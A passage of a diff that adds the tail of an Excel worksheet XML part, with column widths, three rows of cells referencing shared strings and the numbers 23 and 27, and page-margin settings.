+    <col min="1" max="1" width="109.33203125" bestFit="1" customWidth="1"/>
+    <col min="2" max="2" width="15.5" bestFit="1" customWidth="1"/>
+    <col min="3" max="3" width="11" bestFit="1" customWidth="1"/>
+  </cols>
+  <sheetData>
+    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
+      <c r="A3" s="2" t="s">
+        <v>68</v>
+      </c>
+      <c r="B3" t="s">
+        <v>70</v>
+      </c>
+      <c r="C3" t="s">
+        <v>71</v>
+      </c>
+    </row>
+    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
+      <c r="A4" s="3" t="s">
+        <v>8</v>
+      </c>
+      <c r="B4" s="4">
+        <v>23</v>
+      </c>
+      <c r="C4" s="4">
+        <v>27</v>
+      </c>
+    </row>
+    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
+      <c r="A5" s="3" t="s">
+        <v>69</v>
+      </c>
+      <c r="B5" s="4">
+        <v>23</v>
+      </c>
+      <c r="C5" s="4">
+        <v>27</v>
+      </c>
+    </row>
+  </sheetData>
+  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+</worksheet>
 </file>